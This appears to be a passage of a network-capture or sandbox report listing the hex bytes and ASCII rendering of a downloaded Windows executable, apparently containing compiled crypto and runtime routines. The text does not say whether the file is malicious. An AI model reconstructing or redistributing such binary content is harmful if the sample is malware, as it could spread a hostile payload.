                  2023-01-13 15:04:35 UTC579INData Raw: e8 cc 7c fa ff 83 c4 18 89 46 08 8b 3e 8d 47 01 89 06 55 e8 49 d3 fa ff 83 c4 04 8b 4e 08 c1 e7 02 8d 3c 7f 89 04 39 8b 46 08 c7 44 38 04 02 00 00 00 53 e8 a9 7c fd ff 83 c4 04 8b 4e 08 89 44 39 08 83 c4 04 5e 5f 5b 5d c3 cc cc cc cc cc cc cc 55 53 57 56 8b 74 24 14 83 3e 00 74 4c 31 ff bb 08 00 00 00 eb 20 90 90 90 90 90 90 90 90 90 90 ff 74 1d 00 e8 37 82 fa ff 83 c4 04 83 c7 01 83 c3 0c 3b 3e 73 23 8b 6e 08 ff 74 1d f8 e8 2e 7c fa ff 83 c4 04 83 7c 1d fc 02 72 d4 75 1f ff 74 1d 00 e8 09 75 fd ff eb d0 ff 76 08 e8 0f 7c fa ff 83 c4 04 5e 5f 5b 5d e9 03 7c fa ff 6a 58 68 b2 3a 4f 00 68 08 8e 4f 00 e8 05 bf 01 00 83 c4 0c e8 8a 54 f7 ff cc cc cc cc cc cc cc cc cc cc 53 57 56 8b 44 24 10 8b 78 28 8b 37 85 f6 74 3c 83 c7 04 90 90 90 90 90 90 90 90 90 90 90
                  Data Ascii: |F>GUIN<9FD8S|ND9^_[]USWVt$>tL1 t7;>s#nt.||rutuv|^_[]|jXh:OhOTSWVD$x(7t<
                  2023-01-13 15:04:35 UTC587INData Raw: 56 fd ff 83 c4 04 ff 74 24 14 e8 62 56 fd ff 83 c4 04 ff 74 24 28 e8 56 56 fd ff 83 c4 04 ff 74 24 30 e8 4a 56 fd ff 83 c4 04 ff 34 24 e8 3f 56 fd ff 83 c4 04 ff 74 24 0c e8 33 56 fd ff 83 c4 04 ff 74 24 24 e8 27 56 fd ff 83 c4 04 53 e8 1e 56 fd ff 83 c4 04 89 f8 83 c4 3c 5e 5f 5b 5d c3 cc 55 53 57 56 83 ec 10 8b 6c 24 24 55 55 e8 6e fd ff ff 83 c4 08 89 c6 8b 5d 10 6a 00 6a 14 6a 01 e8 6b 5c fa ff 83 c4 0c 89 c7 89 58 10 c7 00 00 00 00 00 c7 40 04 00 00 00 00 c7 40 08 00 00 00 00 c7 40 0c 00 00 00 00 ff 75 00 e8 f0 5c fd ff 83 c4 04 89 07 ff 75 04 e8 e3 5c fd ff 83 c4 04 89 47 04 ff 75 08 e8 d5 5c fd ff 83 c4 04 89 47 08 ff 75 0c e8 c7 5c fd ff 83 c4 04 89 47 0c 8b 5e 10 6a 00 6a 14 6a 01 e8 03 5c fa ff 83 c4 0c 89 58 10 89 c3 c7 00 00 00 00 00 c7 40 04
                  Data Ascii: Vt$bVt$(VVt$0JV4$?Vt$3Vt$$'VSV<^_[]USWVl$$UUn]jjjk\X@@@u\u\Gu\Gu\G^jjj\X@
                  2023-01-13 15:04:35 UTC595INData Raw: 0f 6f dc 66 0f 38 29 da 66 0f db d9 66 0f 73 fb 08 66 0f d4 dc 66 0f 7f 5a ec 83 c1 10 39 c1 0f 82 4c ff ff ff c3 cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 0c 85 c0 0f 8e ea 00 00 00 8b 4c 24 08 8b 54 24 04 01 c8 66 0f 6f 5a ec 66 0f 6f 05 70 8a 4d 00 66 0f 6f 0d 80 8a 4d 00 66 0f ef d2 90 66 0f 38 00 d8 66 0f ef 9a 0c fe ff ff 66 0f 38 dc 9a 1c fe ff ff 66 0f 38 dc 9a 2c fe ff ff 66 0f 38 dc 9a 3c fe ff ff 66 0f 38 dc 9a 4c fe ff ff 66 0f 38 dc 9a 5c fe ff ff 66 0f 38 dc 9a 6c fe ff ff 66 0f 38 dc 9a 7c fe ff ff 66 0f 38 dc 9a 8c fe ff ff 66 0f 38 dc 9a 9c fe ff ff 66 0f 38 dc 9a ac fe ff ff 66 0f 38 dc 9a bc fe ff ff 66 0f 38 dc 9a cc fe ff ff 66 0f 38 dc 9a dc fe ff ff 66 0f 38 dd 9a ec fe ff ff f3 0f 6f 21 66 0f ef e3 f3 0f 7f 21 66 0f 6f 62 ec 66 0f
                  Data Ascii: of8)ffsffZ9LD$L$T$foZfopMfoMff8ff8f8,f8<f8Lf8\f8lf8|f8f8f8f8f8f8f8o!f!fobf
                  2023-01-13 15:04:35 UTC602INData Raw: 24 89 f1 c1 e9 07 89 fb c1 eb 07 31 fb 31 f1 be aa 00 aa 00 21 f1 be aa 00 aa 00 21 f3 c1 e8 18 88 45 03 88 55 04 88 75 05 89 d0 c1 e8 10 88 45 06 89 d8 c1 e0 07 01 d8 31 f8 c1 ea 18 88 55 07 88 45 08 88 65 09 89 c2 c1 ea 10 88 55 0a 89 ca c1 e2 07 01 ca 33 14 24 c1 e8 18 88 45 0b 88 55 0c 88 75 0d 89 d0 c1 e8 10 88 45 0e c1 ea 18 88 55 0f 83 c4 5c 5e 5f 5b 5d c3 cc cc cc cc cc cc cc 55 53 57 56 81 ec c4 00 00 00 89 d3 89 4c 24 58 8b 84 24 d8 00 00 00 8b 0d 34 00 50 00 31 e1 89 8c 24 c0 00 00 00 c7 84 24 bc 00 00 00 00 00 00 00 c7 84 24 b8 00 00 00 00 00 00 00 c7 84 24 b4 00 00 00 00 00 00 00 c7 84 24 b0 00 00 00 00 00 00 00 c7 84 24 ac 00 00 00 00 00 00 00 c7 84 24 a8 00 00 00 00 00 00 00 c7 84 24 a4 00 00 00 00 00 00 00 c7 84 24 a0 00 00 00 00 00 00 00
                  Data Ascii: $11!!EUuE1UEeU3$EUuEU\^_[]USWVL$X$4P1$$$$$$$$$
                  2023-01-13 15:04:35 UTC610INData Raw: 24 0c 31 6c 24 28 8b 6c 24 38 31 e9 89 4c 24 14 8b 4c 24 28 31 e9 31 d3 31 c6 31 74 24 04 31 d6 33 7c 24 10 31 fe 89 f8 8b 54 24 08 31 d0 8b 7c 24 14 31 c7 33 44 24 24 31 ca 89 54 24 08 8b 6c 24 3c 31 c5 31 c8 89 44 24 30 31 7c 24 04 31 df 8b 54 24 0c 31 ea 89 54 24 0c 33 6c 24 2c 8b 44 24 20 33 44 24 10 8b 4c 24 08 31 ca 89 54 24 24 31 c8 8b 5c 24 1c 8b 4c 24 04 31 cb 31 c8 89 44 24 20 89 74 24 34 89 f0 c1 e8 08 31 f0 25 cc 00 cc 00 89 c2 c1 e2 08 09 c2 31 f2 89 d0 c1 e0 0c 25 00 a0 00 a0 89 d1 81 e2 55 55 55 55 09 c2 c1 e9 04 81 e1 aa 0a aa 0a 09 ca 89 54 24 04 89 7c 24 14 89 f8 c1 e8 08 31 f8 25 cc 00 cc 00 89 c2 c1 e2 08 09 c2 31 fa 89 d0 c1 e0 0c 25 00 a0 00 a0 89 d1 81 e2 55 55 55 55 09 c2 c1 e9 04 81 e1 aa 0a aa 0a 09 ca 89 54 24 08 89 5c 24 1c 89
                  Data Ascii: $1l$(l$81L$L$(1111t$13|$1T$1|$13D$$1T$l$<11D$01|$1T$1T$3l$,D$ 3D$L$1T$$1\$L$11D$ t$41%1%UUUUT$|$1%1%UUUUT$\$
                  2023-01-13 15:04:35 UTC618INData Raw: 4c 8b 5c 24 3c 8b 54 24 6c 01 d3 8b 4c 24 78 8b 74 24 5c 11 f1 8b 04 24 0f b6 80 1c 8f 4d 00 03 9c c4 88 00 00 00 89 5c 24 3c 13 8c c4 8c 00 00 00 31 4c 24 30 8b 7c 24 40 31 df 8b 44 24 20 03 44 24 30 89 44 24 20 8b 5c 24 1c 11 fb 89 5c 24 1c 31 c2 31 de 89 d3 0f a4 f3 08 0f a4 d6 08 8b 04 24 0f b6 80 1d 8f 4d 00 8b 54 24 3c 03 94 c4 88 00 00 00 13 8c c4 8c 00 00 00 01 f2 89 54 24 3c 11 d9 89 4c 24 78 31 cf 8b 4c 24 30 31 d1 89 c8 0f a4 f8 10 89 44 24 40 0f ac f9 10 89 4c 24 30 8b 54 24 20 01 ca 89 54 24 20 8b 4c 24 1c 11 c1 89 4c 24 1c 31 cb 31 d6 89 d8 0f a4 f0 01 89 44 24 6c 0f a4 de 01 89 74 24 5c 8b 7c 24 70 8b 54 24 48 01 fa 8b 4c 24 64 13 4c 24 24 8b 04 24 0f b6 80 1e 8f 4d 00 03 94 c4 88 00 00 00 13 8c c4 8c 00 00 00 8b 5c 24 2c 31 cb 89 5c 24 2c
                  Data Ascii: L\$<T$lL$xt$\$M\$<1L$0|$@1D$ D$0D$ \$\$11$MT$<T$<L$x1L$01D$@L$0T$ T$ L$L$11D$lt$\|$pT$HL$dL$$$M\$,1\$,
                  2023-01-13 15:04:35 UTC626INData Raw: 24 8b 46 c8 8b 08 89 e7 6a 10 57 50 ff 51 10 83 c4 0c 66 0f 6f 04 24 66 0f 38 00 05 70 8a 4d 00 66 0f 7f 46 28 66 0f ef c0 66 0f 7f 46 18 6a 10 57 e8 0b 88 fc ff 83 c4 08 8b 4c 24 1c 31 e9 e8 4d 0c 00 00 8d 65 f8 5e 5f 5d c3 cc cc cc cc cc cc b8 8a fa 4e 00 c3 cc cc cc cc cc cc cc cc cc cc 55 53 57 56 50 8b 74 24 20 8b 7c 24 1c 8b 4c 24 18 8d 59 d4 8b 41 e8 8b 49 f4 29 c8 76 14 39 f0 0f 47 c6 01 c1 89 4b 20 29 c6 0f 84 6e 04 00 00 01 c7 8d 43 04 89 04 24 eb 0e 90 90 90 90 90 90 85 f6 0f 84 56 04 00 00 8b 43 18 8b 6b 24 29 e8 0f 86 91 02 00 00 39 f0 0f 47 c6 8b 4b 28 85 c9 0f 85 ca 00 00 00 83 f8 10 0f 82 c1 00 00 00 f3 0f 6f 07 66 0f 38 00 05 70 8a 4d 00 66 0f ef 43 50 66 0f 70 c8 ee 66 0f 6f 53 40 66 0f 70 da ee 66 0f ef c8 66 0f ef da 66 0f 3a 44 d9 00
                  Data Ascii: $FjWPQfo$f8pMfF(ffFjWL$1Me^_]NUSWVPt$ |$L$YAI)v9GK )nC$VCk$)9GK(of8pMfCPfpfoS@fpfff:D
                  2023-01-13 15:04:35 UTC634INData Raw: 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 80 07 00 00 8b 46 08 3b 42 08 0f 84 87 00 00 00 0f b6 c8 0f b6 42 08 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 53 07 00 00 0f b6 4e 09 0f b6 42 09 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 31 07 00 00 0f b6 4e 0a 0f b6 42 0a 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 0f 07 00 00 0f b6 4e 0b 0f b6 42 0b 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 ed 06 00 00 8b 46 0c 3b 42 0c 0f 84 87 00 00 00 0f b6 c8 0f b6 42 0c 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 c0 06 00 00 0f b6 4e 0d 0f b6 42 0d 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 9e 06 00 00 0f b6 4e 0e 0f b6
                  Data Ascii: 3EF;BB+t3ESNB+t3E1NB+t3ENB+t3EF;BB+t3ENB+t3EN
                  2023-01-13 15:04:35 UTC642INData Raw: 00 85 cf 75 39 23 da 81 fb f0 0f 00 00 77 2f f3 0f 6f 0a 66 0f 6f 11 66 0f 74 ca 66 0f 74 d0 66 0f 74 c8 66 0f eb d1 66 0f d7 da 85 db 75 08 83 c2 10 83 c1 10 eb c5 0f bc db 03 d3 03 cb 0f b6 19 85 db 74 10 3a 1a 0f 85 5e ff ff ff 83 c2 01 83 c1 01 eb a7 48 5e 5b 5f c3 33 c0 5e 5b 5f c3 80 39 00 74 f7 8b f9 bb ff 0f 00 00 23 d9 81 fb f0 0f 00 00 77 06 f3 0f 6f 01 eb 22 bb 0f 00 00 00 0f b6 31 83 c1 01 66 0f 3a 20 c6 0f 66 0f 73 d8 01 4b 74 09 85 f6 74 ee eb e6 83 c0 01 66 0f 7e c2 bb ff 0f 00 00 23 d8 81 fb f0 0f 00 00 76 10 0f b6 18 85 db 74 a2 3a d3 74 18 83 c0 01 eb e1 83 c0 10 66 0f 3a 63 40 f0 0c 77 d5 73 8b 83 e8 10 03 c1 8b d7 8b f0 bb ff 0f 00 00 23 de 81 fb f0 0f 00 00 77 29 bb ff 0f 00 00 23 da 81 fb f0 0f 00 00 77 1a f3 0f 6f 0a 83 c6 10 83 c2
                  Data Ascii: u9#w/ofoftftftffut:^H^[_3^[_9t#wo"1f: fsKttf~#vt:tf:c@ws#w)#wo
                  2023-01-13 15:04:35 UTC649INData Raw: 04 00 00 84 c0 0f 85 a6 00 00 00 32 c0 e9 16 03 00 00 6a 01 8b ce e8 8f 14 00 00 eb e6 83 e8 5a 74 15 83 e8 07 74 54 48 83 e8 01 75 de 53 8b ce e8 01 03 00 00 eb cc 8b ce e8 8d 03 00 00 eb c3 83 f8 70 7f 4e 74 40 83 f8 67 7e 2f 83 f8 69 74 1c 83 f8 6e 74 0e 83 f8 6f 75 b0 8b ce e8 be 05 00 00 eb 9f 8b ce e8 6b f8 ff ff eb 96 83 4e 1c 10 53 8b ce e8 2b 17 00 00 eb 88 8b ce e8 14 04 00 00 e9 7c ff ff ff 8b ce e8 af 05 00 00 e9 70 ff ff ff 83 e8 73 0f 84 60 ff ff ff 48 83 e8 01 74 cf 83 e8 03 0f 85 60 ff ff ff 53 e9 63 ff ff ff 38 5e 2c 0f 85 6c 02 00 00 8b 46 1c 33 d2 c1 e8 04 42 66 89 5d f0 8b cb 88 5d f2 89 4d e8 84 c2 74 32 8b 46 1c c1 e8 06 84 c2 74 06 c6 45 f0 2d eb 09 84 56 1c 74 0b c6 45 f0 2b 8b ca 89 4d e8 eb 12 8b 46 1c d1 e8 84 c2 74 09 c6 45 f0
                  Data Ascii: 2jZttTHuSpNt@g~/itntoukNS+|ps`Ht`Sc8^,lF3Bf]]Mt2FtE-VtE+MFtE
                  2023-01-13 15:04:35 UTC657INData Raw: f0 0f 82 fa 00 00 00 66 3b 75 e4 0f 82 e6 00 00 00 8b 45 e0 66 3b f0 0f 82 e4 00 00 00 66 3b 75 dc 0f 82 d0 00 00 00 8b 45 d8 66 3b f0 0f 82 ce 00 00 00 66 3b 75 d4 0f 82 ba 00 00 00 8b 45 d0 66 3b f0 0f 82 b8 00 00 00 66 3b 75 cc 0f 82 a4 00 00 00 8b 45 c8 66 3b f0 0f 82 a2 00 00 00 66 3b 75 c4 0f 82 8e 00 00 00 8b 45 c0 66 3b f0 0f 82 8c 00 00 00 66 3b 75 bc 72 7c 8b 45 b8 66 3b f0 72 7e 66 3b 75 b4 72 6e 8b 45 b0 66 3b f0 72 70 66 3b 75 ac 72 60 8b 45 a8 66 3b f0 72 62 66 3b 75 a4 72 52 8b 45 a0 66 3b f0 72 54 66 3b 75 9c 72 44 8b 45 98 66 3b f0 72 46 66 3b 75 94 72 36 8b 45 90 66 3b f0 72 38 66 3b 75 8c 72 28 8b 45 88 66 3b f0 72 2a 66 3b 75 84 72 1a 8b 45 80 66 3b f0 72 1c 66 3b b5 7c ff ff ff eb 07 66 3b b5 78 ff ff ff 73 0a 0f b7 ce 2b c8 83 f9 ff
                  Data Ascii: f;uEf;f;uEf;f;uEf;f;uEf;f;uEf;f;ur|Ef;r~f;urnEf;rpf;ur`Ef;rbf;urREf;rTf;urDEf;rFf;ur6Ef;r8f;ur(Ef;r*f;urEf;rf;|f;xs+
                  2023-01-13 15:04:35 UTC665INData Raw: 2c fe ff ff 00 6a 00 50 8d 85 30 fe ff ff 68 cc 01 00 00 50 e8 10 ed ff ff 8b 85 2c fe ff ff 83 c4 10 89 85 e8 f6 ff ff eb 79 33 db 8d 85 d8 f4 ff ff 89 9d d4 f4 ff ff e9 33 fd ff ff 8b 85 e8 f6 ff ff 83 ff 01 74 5b 85 c0 74 57 33 c9 8b d8 33 f6 8b c7 f7 a4 b5 30 fe ff ff 03 c1 89 84 b5 30 fe ff ff 83 d2 00 46 8b ca 3b f3 75 e4 8b 85 2c fe ff ff 85 c9 74 aa 83 f8 73 0f 83 70 ff ff ff 89 8c 85 30 fe ff ff 8b 85 2c fe ff ff 40 89 85 e8 f6 ff ff 89 85 2c fe ff ff eb 06 8b 85 e8 f6 ff ff 8b b5 e0 f6 ff ff 85 f6 0f 84 8e 00 00 00 33 d2 85 c0 74 28 33 c0 01 b4 95 30 fe ff ff 13 c0 42 8b f0 8b 85 2c fe ff ff 89 85 e8 f6 ff ff 8b ce 3b d0 75 e0 85 c9 0f 84 00 f9 ff ff 83 f8 73 73 1f 89 b4 85 30 fe ff ff 8b 9d 2c fe ff ff 43 89 9d e8 f6 ff ff 89 9d 2c fe ff ff e9
                  Data Ascii: ,jP0hP,y33t[tW3300F;u,tsp0,@,3t(30B,;uss0,C,
                  2023-01-13 15:04:35 UTC673INData Raw: 7b 08 89 43 04 8d 4b 18 a5 50 52 a5 a5 e8 db f8 ff ff 8b 45 18 83 63 70 00 89 43 68 8b 45 1c 5f 89 43 6c 8b c3 5e 5b 5d c2 18 00 8b ff 53 56 8b f1 57 8d 5e 08 8b cb e8 54 ff ff ff 84 c0 74 0e 8d 7e 18 8b cf e8 ed f8 ff ff 84 c0 75 12 83 c8 ff 5f 5e 5b c3 8b ce e8 53 00 00 00 84 c0 74 0b 8b cf e8 ec f8 ff ff 84 c0 75 ea 8b 7e 70 85 ff 75 1c 83 7e 28 01 74 16 8b cb e8 33 ff ff ff 83 f8 ff 75 02 0b f8 50 8b cb e8 3a ff ff ff 8b 06 83 e0 01 83 c8 00 74 13 8b 76 24 85 f6 74 0c e8 08 39 00 00 89 30 e8 0f b5 00 00 8b c7 eb a2 8b ff 56 8b f1 8b 46 28 48 83 e8 01 74 2e 83 e8 01 74 23 83 e8 01 74 04 32 c0 5e c3 e8 c2 00 00 00 84 c0 74 f5 83 7e 40 09 74 ef 80 7e 2e 00 75 e9 ff 46 70 5e c3 5e e9 23 00 00 00 5e e9 00 00 00 00 8b ff 56 ff 71 68 8d 71 08 56 e8 26 03 00
                  Data Ascii: {CKPREcpChE_Cl^[]SVW^Tt~u_^[Stu~pu~(t3uP:tv$t90VF(Ht.t#t2^t~@t~.uFp^^#^VqhqV&
                  2023-01-13 15:04:35 UTC681INData Raw: 03 83 c1 20 6a 38 5a 83 f9 75 75 41 0f b7 8d 32 ff ff ff 8d 41 bf 83 f8 19 77 03 83 c1 20 83 f9 74 75 2a 0f b7 8d 34 ff ff ff 8d 41 bf 83 f8 19 77 03 83 c1 20 83 f9 66 75 13 66 39 95 36 ff ff ff 75 0a 66 83 bd 38 ff ff ff 00 74 29 66 83 bd 36 ff ff ff 2d 0f 85 e3 00 00 00 66 39 95 38 ff ff ff 0f 85 d6 00 00 00 66 83 bd 3a ff ff ff 00 0f 85 c8 00 00 00 b8 e9 fd 00 00 eb 0d 8d 85 50 ff ff ff 50 e8 d0 10 00 00 59 47 0f b7 c0 57 56 89 03 8b 9d 28 fe ff ff 68 83 00 00 00 53 e8 b3 c7 00 00 83 c4 10 85 c0 0f 85 b0 00 00 00 8d 8d 50 ff ff ff 8d 51 02 66 8b 01 83 c1 02 66 3b 85 20 fe ff ff 75 f1 2b ca d1 f9 8d 41 01 50 8d 85 50 ff ff ff 50 8d 8d 04 fe ff ff e8 22 11 00 00 33 c0 66 39 06 74 24 b8 83 00 00 00 39 85 18 fe ff ff 73 17 57 56 50 ff b5 24 fe ff ff e8 54
                  Data Ascii: j8ZuuA2Aw tu*4Aw fuf96uf8t)f6-f98f:PPYGWV(hSPQff; u+APPP"3f9t$9sWVP$T
                  2023-01-13 15:04:35 UTC688INData Raw: eb 0c a3 64 3a 50 00 33 ff a3 60 3a 50 00 6a 00 e8 52 76 00 00 56 e8 4c 76 00 00 59 59 8b c7 5f 5e c3 8b ff 55 8b ec 8b 45 08 8b 00 3b 05 68 3a 50 00 74 07 50 e8 1e 00 00 00 59 5d c3 8b ff 55 8b ec 8b 45 08 8b 00 3b 05 64 3a 50 00 74 07 50 e8 03 00 00 00 59 5d c3 8b ff 55 8b ec 56 8b 75 08 85 f6 74 1f 8b 06 57 8b fe eb 0c 50 e8 f5 75 00 00 8d 7f 04 8b 07 59 85 c0 75 f0 56 e8 e5 75 00 00 59 5f 5e 5d c3 a1 5c 3a 50 00 85 c0 75 22 39 05 60 3a 50 00 74 18 e8 d6 fe ff ff 85 c0 74 09 e8 39 02 00 00 85 c0 75 06 a1 5c 3a 50 00 c3 33 c0 c3 a1 60 3a 50 00 85 c0 75 22 39 05 5c 3a 50 00 74 18 e8 04 ff ff ff 85 c0 74 09 e8 90 02 00 00 85 c0 75 06 a1 60 3a 50 00 c3 33 c0 c3 8b ff 55 8b ec 51 51 53 8b 5d 08 33 d2 56 57 8b f3 8a 03 eb 18 3c 3d 74 01 42 8b ce 8d 79 01 8a
                  Data Ascii: d:P3`:PjRvVLvYY_^UE;h:PtPY]UE;d:PtPY]UVutWPuYuVuY_^]\:Pu"9`:Ptt9u\:P3`:Pu"9\:Pttu`:P3UQQS]3VW<=tBy
                  2023-01-13 15:04:35 UTC696INData Raw: cb 02 eb 06 66 83 fe 2b 75 0e 8b 55 0c 0f b7 32 83 c2 02 89 55 0c eb 03 8b 55 0c c7 85 74 ff ff ff 3a 00 00 00 b8 10 ff 00 00 c7 45 f8 60 06 00 00 c7 45 f4 6a 06 00 00 c7 45 f0 f0 06 00 00 c7 45 ec fa 06 00 00 c7 45 e8 66 09 00 00 c7 45 e4 70 09 00 00 c7 45 e0 e6 09 00 00 c7 45 dc f0 09 00 00 c7 45 d8 66 0a 00 00 c7 45 d4 70 0a 00 00 c7 45 d0 e6 0a 00 00 c7 45 cc f0 0a 00 00 c7 45 c8 66 0b 00 00 c7 45 c4 70 0b 00 00 c7 45 c0 66 0c 00 00 c7 45 bc 70 0c 00 00 c7 45 b8 e6 0c 00 00 c7 45 b4 f0 0c 00 00 c7 45 b0 66 0d 00 00 c7 45 ac 70 0d 00 00 c7 45 a8 50 0e 00 00 c7 45 a4 5a 0e 00 00 c7 45 a0 d0 0e 00 00 c7 45 9c da 0e 00 00 c7 45 98 20 0f 00 00 c7 45 94 2a 0f 00 00 c7 45 90 40 10 00 00 c7 45 8c 4a 10 00 00 c7 45 88 e0 17 00 00 c7 45 84 ea 17 00 00 c7 45 80
                  Data Ascii: f+uU2UUt:E`EjEEEfEpEEEfEpEEEfEpEfEpEEEfEpEPEZEEE E*E@EJEEE
                  2023-01-13 15:04:35 UTC704INData Raw: 04 ff ff ff 8b b5 f4 fe ff ff 89 9d 04 ff ff ff 3b de 72 4a 89 85 f0 fe ff ff 8b d3 74 2b 2b f3 8b d8 8a 02 8d 52 01 8a 4c 16 ff 88 44 16 ff 88 4a ff 83 eb 01 75 eb 8b b5 f4 fe ff ff 8b 9d 04 ff ff ff 8b 85 00 ff ff ff 8b 95 08 ff ff ff 3b fb 0f 85 ed fe ff ff 8b fe e9 e6 fe ff ff 3b f9 73 3c 8b 9d f8 fe ff ff eb 07 8d a4 24 00 00 00 00 2b c8 89 8d 04 ff ff ff 3b cf 76 21 57 51 8b cb ff 15 00 50 50 00 ff d3 8b 8d 04 ff ff ff 83 c4 08 85 c0 8b 85 00 ff ff ff 74 d5 eb 44 8b 9d f8 fe ff ff 8b b5 fc fe ff ff 8d a4 24 00 00 00 00 2b c8 89 8d 04 ff ff ff 3b ce 76 1f 57 51 8b cb ff 15 00 50 50 00 ff d3 8b 8d 04 ff ff ff 83 c4 08 85 c0 8b 85 00 ff ff ff 74 d5 8b b5 f4 fe ff ff 8b 95 08 ff ff ff 8b ca 8b bd 04 ff ff ff 2b ce 8b c7 2b 85 fc fe ff ff 3b c1 7c 3d 8b
                  Data Ascii: ;rJt++RLDJu;;s<$+;v!WQPPtD$+;vWQPPt++;|=
                  2023-01-13 15:04:35 UTC712INData Raw: d7 4f 00 5e 5d c2 1c 00 8b ff 55 8b ec 56 e8 1d 06 00 00 ff 75 14 8b f0 ff 75 10 ff 75 0c 85 f6 74 0f ff 75 08 8b ce ff 15 00 50 50 00 ff d6 eb 11 6a 00 ff 75 08 e8 ac 01 00 00 50 ff 15 f4 d7 4f 00 5e 5d c2 10 00 8b ff 55 8b ec 56 e8 f8 05 00 00 ff 75 1c 8b f0 ff 75 18 ff 75 14 ff 75 10 ff 75 0c 85 f6 74 0f ff 75 08 8b ce ff 15 00 50 50 00 ff d6 eb 11 6a 00 ff 75 08 e8 67 01 00 00 50 ff 15 3c d8 4f 00 5e 5d c2 18 00 8b ff 55 8b ec 56 e8 cd 05 00 00 8b f0 85 f6 74 12 ff 75 0c 8b ce ff 75 08 ff 15 00 50 50 00 ff d6 eb 14 6a 00 ff 75 0c ff 75 08 ff 15 44 d8 4f 00 50 e8 e5 00 00 00 5e 5d c2 08 00 8b ff 55 8b ec 56 68 a4 a8 4d 00 68 9c a8 4d 00 68 f0 95 4f 00 6a 0e e8 61 04 00 00 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 00 50 50 00 ff
                  Data Ascii: O^]UVuuutuPPjuPO^]UVuuuuutuPPjugP<O^]UVtuuPPjuuDOP^]UVhMhMhOjatuuuPP
                  2023-01-13 15:04:35 UTC720INData Raw: 50 00 8b ce 83 e1 1f 33 35 80 3f 50 00 d3 ce 89 75 e4 c7 45 fc fe ff ff ff e8 17 00 00 00 8b c6 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c2 0c 00 8b 75 e4 8b 4d 10 ff 31 e8 dc e8 ff ff 59 c3 8b ff 55 8b ec 6b 45 08 38 05 98 07 50 00 5d c3 8b ff 55 8b ec 8b 45 08 83 c0 20 50 ff 15 70 d7 4f 00 5d c3 8b ff 55 8b ec 8b 45 08 83 c0 20 50 ff 15 94 d8 4f 00 5d c3 a1 8c 3f 50 00 56 6a 03 5e 85 c0 75 07 b8 00 02 00 00 eb 06 3b c6 7d 07 8b c6 a3 8c 3f 50 00 6a 04 50 e8 75 14 00 00 6a 00 a3 90 3f 50 00 e8 bb f8 ff ff 83 c4 0c 83 3d 90 3f 50 00 00 75 2b 6a 04 56 89 35 8c 3f 50 00 e8 4f 14 00 00 6a 00 a3 90 3f 50 00 e8 95 f8 ff ff 83 c4 0c 83 3d 90 3f 50 00 00 75 05 83 c8 ff 5e c3 57 33 ff be 98 07 50 00 6a 00 68 a0 0f 00 00 8d 46 20 50 e8 8d e0 ff ff a1 90 3f 50
                  Data Ascii: P35?PuEMdY_^[uM1YUkE8P]UE PpO]UE PO]?PVj^u;}?PjPuj?P=?Pu+jV5?POj?P=?Pu^W3PjhF P?P
                  2023-01-13 15:04:35 UTC727INData Raw: 00 6a 50 6a 01 e8 cb f5 ff ff 8b f0 6a 00 89 75 fc e8 11 da ff ff 83 c4 0c 85 f6 75 08 33 c0 40 e9 55 03 00 00 6a 04 6a 01 e8 a7 f5 ff ff 8b f8 6a 00 89 7d f8 e8 ed d9 ff ff 83 c4 0c 85 ff 75 09 56 e8 e0 d9 ff ff 59 eb d3 83 bb ac 00 00 00 00 0f 84 82 02 00 00 6a 04 6a 01 e8 75 f5 ff ff 8b f8 6a 00 89 7d f4 e8 bb d9 ff ff 83 c4 0c 85 ff 75 12 56 e8 ae d9 ff ff 8b 45 f8 50 e8 a5 d9 ff ff 59 eb c2 8b bb ac 00 00 00 8d 46 0c 50 6a 15 57 8d 45 e8 6a 01 50 e8 b0 b9 00 00 8b 4d fc 8b f0 83 c1 10 8d 45 e8 51 6a 14 57 6a 01 50 e8 99 b9 00 00 0b f0 8b 45 fc 83 c0 14 50 6a 16 57 8d 45 e8 6a 01 50 e8 82 b9 00 00 0b f0 8b 45 fc 83 c0 18 50 6a 17 57 8d 45 e8 6a 01 50 e8 6b b9 00 00 83 c4 50 0b f0 8b 45 fc 83 c0 1c 89 45 f0 50 6a 18 57 8d 45 e8 6a 01 50 e8 4e b9 00 00
                  Data Ascii: jPjjuu3@Ujjj}uVYjjuj}uVEPYFPjWEjPMEQjWjPEPjWEjPEPjWEjPkPEEPjWEjPN
                  2023-01-13 15:04:35 UTC735INData Raw: 76 50 e8 77 06 00 00 59 8b d0 6a 01 68 7c 85 4b 00 89 56 5c ff 15 74 d7 4f 00 8b 0f f6 c1 07 0f 95 c2 0f ba e1 09 0f 92 c0 22 d0 0f ba e1 08 0f 92 c0 84 d0 75 02 89 1f 5f 5e 5b 5d c3 8b ff 55 8b ec 81 ec fc 00 00 00 a1 34 00 50 00 33 c5 89 45 fc 53 56 8b 75 08 57 e8 b6 aa ff ff 8b d8 e8 af aa ff ff 56 8b b8 4c 03 00 00 e8 ba 05 00 00 59 8b 4b 64 8b f0 f7 d9 8d 85 0c ff ff ff 6a 78 1b c9 81 e1 05 f0 ff ff 50 81 c1 02 10 00 00 51 56 ff 15 f4 d7 4f 00 83 a5 08 ff ff ff 00 85 c0 0f 84 d4 01 00 00 8d 85 0c ff ff ff 50 ff 73 54 e8 d8 9d 00 00 59 59 85 c0 0f 85 b5 00 00 00 6a 78 8d 85 0c ff ff ff 50 8b 43 60 f7 d8 1b c0 25 02 f0 ff ff 05 01 10 00 00 50 56 ff 15 f4 d7 4f 00 85 c0 0f 84 91 01 00 00 8d 85 0c ff ff ff 50 ff 73 50 e8 95 9d 00 00 59 59 8b 0f 85 c0 75
                  Data Ascii: vPwYjh|KV\tO"u_^[]U4P3ESVuWVLYKdjxPQVOPsTYYjxPC`%PVOPsPYYu
